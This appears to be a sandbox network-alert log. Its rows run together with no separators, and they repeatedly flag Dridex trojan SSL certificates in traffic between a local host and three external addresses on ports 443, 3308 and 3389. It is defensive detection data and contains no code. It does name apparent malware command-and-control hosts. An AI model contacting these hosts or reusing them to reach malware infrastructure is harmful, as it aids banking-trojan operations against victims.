                                                                                                  01/11/21-18:24:35.675165TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:36.180308TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:36.701912TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491945.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:36.701912TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491945.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:37.721714TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:38.633465TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:40.247759TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491985.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:40.247759TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491985.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:41.352306TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:41.882478TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:42.400443TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492025.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:42.400443TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492025.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:43.441084TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:43.970653TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:44.784299TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492065.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:44.784299TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492065.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:45.827469TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:46.347904TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:46.894168TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492105.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:46.894168TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492105.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:47.954910TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:48.462472TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:48.993627TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492145.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:48.993627TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492145.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:50.044634TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:50.565137TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:51.109553TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492185.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:51.109553TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492185.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:52.163078TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:52.675982TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:53.221688TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492225.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:53.221688TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492225.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:54.272574TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:54.783450TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:55.294061TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492275.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:55.294061TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492275.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:56.597748TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:57.820021TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:24:58.381189TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492325.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:58.381189TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492325.100.228.233192.168.2.22
                                                                                                  01/11/21-18:24:59.430222TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:24:59.954230TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:00.469507TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492365.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:00.469507TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492365.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:01.516469TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:02.028809TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:02.557197TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492405.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:02.557197TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492405.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:03.316520TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:03.840872TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:04.379325TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492445.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:04.379325TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492445.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:05.397773TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:05.930820TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:06.466964TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492485.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:06.466964TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492485.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:07.524579TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:08.057984TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:08.579659TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492525.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:08.579659TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492525.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:09.613313TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:10.124393TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:10.653345TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492565.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:10.653345TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492565.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:11.690590TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:12.204942TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:12.738152TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492605.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:12.738152TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492605.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:13.871499TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:14.783783TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:15.296161TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492645.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:15.296161TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492645.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:16.326150TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:16.845664TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:17.368557TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492685.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:17.368557TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492685.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:18.418039TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:18.938350TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:19.466815TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492725.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:19.466815TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492725.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:20.523107TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:21.027947TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:21.555781TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492765.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:21.555781TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492765.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:22.581988TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:23.101739TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:23.633661TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492805.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:23.633661TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492805.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:24.690195TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:25.228631TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:25.749291TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492845.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:25.749291TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492845.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:26.839868TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:27.365887TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:27.887495TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492885.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:27.887495TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492885.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:28.931385TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:29.456320TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:29.978826TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492925.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:29.978826TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492925.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:31.688612TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:32.271285TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:32.795728TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492965.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:32.795728TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492965.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:33.865891TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:34.381539TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:34.911996TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493005.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:34.911996TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493005.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:35.949764TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:36.476727TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:36.998940TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493045.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:36.998940TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493045.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:38.059653TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:38.584370TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:39.102658TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493085.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:39.102658TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493085.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:40.171828TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:40.689339TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:41.207890TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493125.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:41.207890TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493125.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:42.254715TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:42.781748TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:43.309464TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493165.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:43.309464TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493165.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:44.393405TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:44.917346TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:45.429911TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493205.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:45.429911TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493205.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:46.446501TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:46.959593TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:47.488334TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493245.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:47.488334TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493245.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:51.514473TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:52.049774TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:52.566752TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493285.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:52.566752TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493285.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:53.597985TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:54.123161TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:54.653460TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493325.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:54.653460TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493325.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:55.689354TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:56.214283TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:56.751404TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493365.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:56.751404TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493365.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:57.790465TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:25:58.318788TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:25:58.855969TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493405.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:58.855969TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493405.100.228.233192.168.2.22
                                                                                                  01/11/21-18:25:59.870026TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:00.394529TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:00.909313TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493445.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:00.909313TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493445.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:01.948947TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:02.485526TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934780.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:03.000993TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493485.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:03.000993TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493485.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:04.052506TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935077.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:04.572119TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935180.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:05.080011TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493525.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:05.080011TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493525.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:06.126055TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935477.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:06.646119TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935580.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:07.156077TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493565.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:07.156077TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493565.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:08.185564TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935877.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:08.704937TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935980.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:09.223194TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493605.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:09.223194TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493605.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:10.258871TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936277.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:10.765154TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936380.86.91.27192.168.2.22
                                                                                                  01/11/21-18:26:11.257306TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493645.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:11.257306TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493645.100.228.233192.168.2.22
                                                                                                  01/11/21-18:26:12.393047TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936677.220.64.37192.168.2.22
                                                                                                  01/11/21-18:26:12.971566TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936780.86.91.27192.168.2.22
